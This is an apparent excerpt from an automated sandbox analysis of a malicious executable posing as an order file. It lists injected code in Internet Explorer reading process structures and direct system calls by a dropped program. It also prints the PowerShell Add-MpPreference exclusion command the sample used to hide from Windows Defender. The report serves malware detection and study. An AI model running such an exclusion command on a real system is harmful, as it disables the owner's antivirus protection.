                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B7208 mov eax, dword ptr fs:[00000030h]5_2_032B7208
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B7208 mov eax, dword ptr fs:[00000030h]5_2_032B7208
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330274 mov eax, dword ptr fs:[00000030h]5_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03284260 mov eax, dword ptr fs:[00000030h]5_2_03284260
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03284260 mov eax, dword ptr fs:[00000030h]5_2_03284260
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03284260 mov eax, dword ptr fs:[00000030h]5_2_03284260
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327826B mov eax, dword ptr fs:[00000030h]5_2_0327826B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C1270 mov eax, dword ptr fs:[00000030h]5_2_032C1270
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C1270 mov eax, dword ptr fs:[00000030h]5_2_032C1270
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A9274 mov eax, dword ptr fs:[00000030h]5_2_032A9274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334D26B mov eax, dword ptr fs:[00000030h]5_2_0334D26B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334D26B mov eax, dword ptr fs:[00000030h]5_2_0334D26B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333B256 mov eax, dword ptr fs:[00000030h]5_2_0333B256
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333B256 mov eax, dword ptr fs:[00000030h]5_2_0333B256
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B724D mov eax, dword ptr fs:[00000030h]5_2_032B724D
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03279240 mov eax, dword ptr fs:[00000030h]5_2_03279240
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03279240 mov eax, dword ptr fs:[00000030h]5_2_03279240
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03286259 mov eax, dword ptr fs:[00000030h]5_2_03286259
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327A250 mov eax, dword ptr fs:[00000030h]5_2_0327A250
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032902A0 mov eax, dword ptr fs:[00000030h]5_2_032902A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032902A0 mov eax, dword ptr fs:[00000030h]5_2_032902A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032952A0 mov eax, dword ptr fs:[00000030h]5_2_032952A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032952A0 mov eax, dword ptr fs:[00000030h]5_2_032952A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032952A0 mov eax, dword ptr fs:[00000030h]5_2_032952A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032952A0 mov eax, dword ptr fs:[00000030h]5_2_032952A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033092BC mov eax, dword ptr fs:[00000030h]5_2_033092BC
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033092BC mov eax, dword ptr fs:[00000030h]5_2_033092BC
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033092BC mov ecx, dword ptr fs:[00000030h]5_2_033092BC
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033092BC mov ecx, dword ptr fs:[00000030h]5_2_033092BC
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033172A0 mov eax, dword ptr fs:[00000030h]5_2_033172A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033172A0 mov eax, dword ptr fs:[00000030h]5_2_033172A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033162A0 mov eax, dword ptr fs:[00000030h]5_2_033162A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033162A0 mov ecx, dword ptr fs:[00000030h]5_2_033162A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033162A0 mov eax, dword ptr fs:[00000030h]5_2_033162A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033162A0 mov eax, dword ptr fs:[00000030h]5_2_033162A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033162A0 mov eax, dword ptr fs:[00000030h]5_2_033162A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033162A0 mov eax, dword ptr fs:[00000030h]5_2_033162A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033492A6 mov eax, dword ptr fs:[00000030h]5_2_033492A6
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033492A6 mov eax, dword ptr fs:[00000030h]5_2_033492A6
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033492A6 mov eax, dword ptr fs:[00000030h]5_2_033492A6
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033492A6 mov eax, dword ptr fs:[00000030h]5_2_033492A6
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BE284 mov eax, dword ptr fs:[00000030h]5_2_032BE284
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BE284 mov eax, dword ptr fs:[00000030h]5_2_032BE284
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03300283 mov eax, dword ptr fs:[00000030h]5_2_03300283
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03300283 mov eax, dword ptr fs:[00000030h]5_2_03300283
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03300283 mov eax, dword ptr fs:[00000030h]5_2_03300283
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B329E mov eax, dword ptr fs:[00000030h]5_2_032B329E
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B329E mov eax, dword ptr fs:[00000030h]5_2_032B329E
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03355283 mov eax, dword ptr fs:[00000030h]5_2_03355283
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032902E1 mov eax, dword ptr fs:[00000030h]5_2_032902E1
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032902E1 mov eax, dword ptr fs:[00000030h]5_2_032902E1
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032902E1 mov eax, dword ptr fs:[00000030h]5_2_032902E1
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333F2F8 mov eax, dword ptr fs:[00000030h]5_2_0333F2F8
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033552E2 mov eax, dword ptr fs:[00000030h]5_2_033552E2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032792FF mov eax, dword ptr fs:[00000030h]5_2_032792FF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED mov eax, dword ptr fs:[00000030h]5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AB2C0 mov eax, dword ptr fs:[00000030h]5_2_032AB2C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AB2C0 mov eax, dword ptr fs:[00000030h]5_2_032AB2C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AB2C0 mov eax, dword ptr fs:[00000030h]5_2_032AB2C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AB2C0 mov eax, dword ptr fs:[00000030h]5_2_032AB2C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AB2C0 mov eax, dword ptr fs:[00000030h]5_2_032AB2C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AB2C0 mov eax, dword ptr fs:[00000030h]5_2_032AB2C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AB2C0 mov eax, dword ptr fs:[00000030h]5_2_032AB2C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A2C3 mov eax, dword ptr fs:[00000030h]5_2_0328A2C3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A2C3 mov eax, dword ptr fs:[00000030h]5_2_0328A2C3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A2C3 mov eax, dword ptr fs:[00000030h]5_2_0328A2C3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A2C3 mov eax, dword ptr fs:[00000030h]5_2_0328A2C3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A2C3 mov eax, dword ptr fs:[00000030h]5_2_0328A2C3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032892C5 mov eax, dword ptr fs:[00000030h]5_2_032892C5
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032892C5 mov eax, dword ptr fs:[00000030h]5_2_032892C5
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B2D3 mov eax, dword ptr fs:[00000030h]5_2_0327B2D3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B2D3 mov eax, dword ptr fs:[00000030h]5_2_0327B2D3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B2D3 mov eax, dword ptr fs:[00000030h]5_2_0327B2D3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AF2D0 mov eax, dword ptr fs:[00000030h]5_2_032AF2D0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AF2D0 mov eax, dword ptr fs:[00000030h]5_2_032AF2D0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B0124 mov eax, dword ptr fs:[00000030h]5_2_032B0124
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B136 mov eax, dword ptr fs:[00000030h]5_2_0327B136
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B136 mov eax, dword ptr fs:[00000030h]5_2_0327B136
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B136 mov eax, dword ptr fs:[00000030h]5_2_0327B136
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327B136 mov eax, dword ptr fs:[00000030h]5_2_0327B136
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03281131 mov eax, dword ptr fs:[00000030h]5_2_03281131
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03281131 mov eax, dword ptr fs:[00000030h]5_2_03281131
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03340115 mov eax, dword ptr fs:[00000030h]5_2_03340115
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0332A118 mov ecx, dword ptr fs:[00000030h]5_2_0332A118
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0332A118 mov eax, dword ptr fs:[00000030h]5_2_0332A118
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0332A118 mov eax, dword ptr fs:[00000030h]5_2_0332A118
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0332A118 mov eax, dword ptr fs:[00000030h]5_2_0332A118
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03319179 mov eax, dword ptr fs:[00000030h]5_2_03319179
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F172 mov eax, dword ptr fs:[00000030h]5_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BA660 mov eax, dword ptr fs:[00000030h]5_2_032BA660
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BA660 mov eax, dword ptr fs:[00000030h]5_2_032BA660
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B9660 mov eax, dword ptr fs:[00000030h]5_2_032B9660
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B9660 mov eax, dword ptr fs:[00000030h]5_2_032B9660
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334866E mov eax, dword ptr fs:[00000030h]5_2_0334866E
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334866E mov eax, dword ptr fs:[00000030h]5_2_0334866E
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B2674 mov eax, dword ptr fs:[00000030h]5_2_032B2674
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329C640 mov eax, dword ptr fs:[00000030h]5_2_0329C640
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327D6AA mov eax, dword ptr fs:[00000030h]5_2_0327D6AA
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327D6AA mov eax, dword ptr fs:[00000030h]5_2_0327D6AA
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BC6A6 mov eax, dword ptr fs:[00000030h]5_2_032BC6A6
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032776B2 mov eax, dword ptr fs:[00000030h]5_2_032776B2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032776B2 mov eax, dword ptr fs:[00000030h]5_2_032776B2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032776B2 mov eax, dword ptr fs:[00000030h]5_2_032776B2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B66B0 mov eax, dword ptr fs:[00000030h]5_2_032B66B0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03284690 mov eax, dword ptr fs:[00000030h]5_2_03284690
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03284690 mov eax, dword ptr fs:[00000030h]5_2_03284690
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330368C mov eax, dword ptr fs:[00000030h]5_2_0330368C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330368C mov eax, dword ptr fs:[00000030h]5_2_0330368C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330368C mov eax, dword ptr fs:[00000030h]5_2_0330368C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330368C mov eax, dword ptr fs:[00000030h]5_2_0330368C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033006F1 mov eax, dword ptr fs:[00000030h]5_2_033006F1
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033006F1 mov eax, dword ptr fs:[00000030h]5_2_033006F1
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333D6F0 mov eax, dword ptr fs:[00000030h]5_2_0333D6F0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B36EF mov eax, dword ptr fs:[00000030h]5_2_032B36EF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AD6E0 mov eax, dword ptr fs:[00000030h]5_2_032AD6E0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AD6E0 mov eax, dword ptr fs:[00000030h]5_2_032AD6E0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FE6F2 mov eax, dword ptr fs:[00000030h]5_2_032FE6F2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FE6F2 mov eax, dword ptr fs:[00000030h]5_2_032FE6F2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FE6F2 mov eax, dword ptr fs:[00000030h]5_2_032FE6F2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FE6F2 mov eax, dword ptr fs:[00000030h]5_2_032FE6F2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033136EE mov eax, dword ptr fs:[00000030h]5_2_033136EE
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033136EE mov eax, dword ptr fs:[00000030h]5_2_033136EE
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033136EE mov eax, dword ptr fs:[00000030h]5_2_033136EE
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033136EE mov eax, dword ptr fs:[00000030h]5_2_033136EE
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033136EE mov eax, dword ptr fs:[00000030h]5_2_033136EE
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033136EE mov eax, dword ptr fs:[00000030h]5_2_033136EE
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B16CF mov eax, dword ptr fs:[00000030h]5_2_032B16CF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328B6C0 mov eax, dword ptr fs:[00000030h]5_2_0328B6C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328B6C0 mov eax, dword ptr fs:[00000030h]5_2_0328B6C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328B6C0 mov eax, dword ptr fs:[00000030h]5_2_0328B6C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328B6C0 mov eax, dword ptr fs:[00000030h]5_2_0328B6C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328B6C0 mov eax, dword ptr fs:[00000030h]5_2_0328B6C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328B6C0 mov eax, dword ptr fs:[00000030h]5_2_0328B6C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BA6C7 mov ebx, dword ptr fs:[00000030h]5_2_032BA6C7
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtTerminateThread: Direct from: 0x76EF2FCC
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
